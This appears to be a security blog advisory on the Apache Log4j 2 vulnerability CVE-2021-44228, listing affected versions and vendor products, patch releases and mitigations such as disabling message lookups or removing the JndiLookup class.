Apache Log4j 2 vulnerability CVE-2021-44228


main

A critical security vulnerability has been identified in the popular “Apache Log4j 2” library. This vulnerability is identified as CVE-2021-44228.

Summary

Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property “log4j2.formatMsgNoLookups” to “true” or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting “com.sun.jndi.rmi.object.trustURLCodebase” and “com.sun.jndi.cosnaming.object.trustURLCodebase” to “false”.

Affected versions

According to Apache’s advisory , all Apache Log4j (version 2.x) versions up to 2.14.1 are vulnerable if message lookup substitution was enabled.

Affected products and services

Apache

Sources:

Apache Druid

Apache Flink

Apache Kafka

Apache Solr

Elastic

Confirmed the vulnerability here

Elastic Search (and the Open Distro variants)
Elastic Logstash
APM Java Agent

VMware

The list can be found here

API Portal for VMware Tanzu
App Metrics
Healthwatch for Tanzu Application Service
Single Sign-On for VMware Tanzu Application Service
Spring Cloud Gateway for Kubernetes
Spring Cloud Gateway for VMware Tanzu
Spring Cloud Services for VMware Tanzu
VMware Carbon Black Cloud Workload Appliance
VMware Carbon Black EDR Servers
VMware Cloud Foundation
VMware HCX
VMware Horizon
VMware Identity Manager
VMware NSX-T Data Center
VMware Site Recovery Manager
VMware Tanzu Application Service for VMs
VMware Tanzu GemFire
VMware Tanzu Greenplum
VMware Tanzu Kubernetes Grid Integrated Edition
VMware Tanzu Observability by Wavefront Nozzle
VMware Tanzu Operations Manager
VMware Tanzu SQL with MySQL for VMs
VMware Telco Cloud Automation
VMware Unified Access Gateway
VMware vCenter Cloud Gateway
VMware vCenter Server
VMware vRealize Automation
VMware vRealize Lifecycle Manager
VMware vRealize Log Insight
VMware vRealize Operations
VMware vRealize Operations Cloud Proxy
VMware vRealize Orchestrator
VMware WorkspaceOne Access

Cisco

The list can be found here

Cisco Webex Meetings Server
Cisco Evolved Programmable Network Manager
Cisco Integrated Management Controller (IMC) Supervisor
Cisco Intersight Virtual Appliance
Cisco UCS Director
Cisco Unified Contact Center Enterprise - Live Data server
Cisco Video Surveillance Operations Manager
Cisco Unified Communications Manager Cloud
Cisco Webex Cloud-Connected UC (CCUC)
Cisco Common Services Platform Collector (CSPC)

Others

Apereo CAS
Blender
CheckPoint Quantum Security Management
Connect2id server
Contrast Security self-hosted and cloud
Couchbase Elasticsearch Connector
Cpanel via Solr plugin
Dynatrace Synthetic Chromium
Forcepoint Security Manager & DLP Manager
Ghidra
GoAnywhere
Grails
Graylog
JAMF Pro
JGAAP
Jitsi video bridge
Kafka Connect CosmosDB
Metabase
Minecraft clients and servers
N-Able Risk Intelligence
Nelson
Neo4J
New Relic Java Agent
Okta Radius Server Agent & On-Prem MFA Agent
OpenHab
OpenNMS
OpenSearch
PagerDuty Rundeck
Pegasystems self-hosted
Positive Technologies MaxPatrol VM
Puppet Continuous Delivery for Puppet Enterprise
PureStorage Portworx and possibly other products
Red Hat is reporting affected packages
RSA SecureID Authentication Manager
SecurityOnion
Sophos Mobile EAS Proxy
Splunk
Spring Boot if log4j was configured
SwingSet
Talend Component Kit
Ubiquiti UniFi Network Application
Wowza Streaming Engine
ZAP Proxy

Patch

With the official Apache patch being released, 2.15.0-rc1 was initially reported to have fixed the CVE-2021-44228 vulnerability. However, a subsequent bypass was discovered. A newly released 2.15.0-rc2 version was in turn released, which protects users against this vulnerability.

According to p0rz9, the Chinese security researcher who first posted the exploit code online, CVE-2021-44228 can only be abused if the log4j2.formatMsgNoLookups option in the library’s configuration is set to false.

In a conversation today, Heige, the founder and CEO of Chinese security firm KnownSec 404 Team and one of the first researchers to understand the vulnerability’s impact, told The Record that today’s Log4j 2.15.0 release basically sets this option to true in order to block attacks.

Unfortunately, this option is set to false by default in old releases, meaning that all past Log4j releases since 2.10.0, when this option was added, are vulnerable by default.

The CVE-2021-44228 vulnerability is still being actively investigated in order to properly identify the full scope severity. Given the information currently available, this vulnerability may have a high impact at present and in the future. Most of the applications being affected are widely used in corporate networks as well as home networks. Users are encouraged to take all necessary steps to ensure they are protected against this vulnerability, as outlined below.

Resources

CVE-2021-44228 Detail

Apache’s advisory

VMSA-2021-0028.1

Remote code injection in Log4j

Back to blog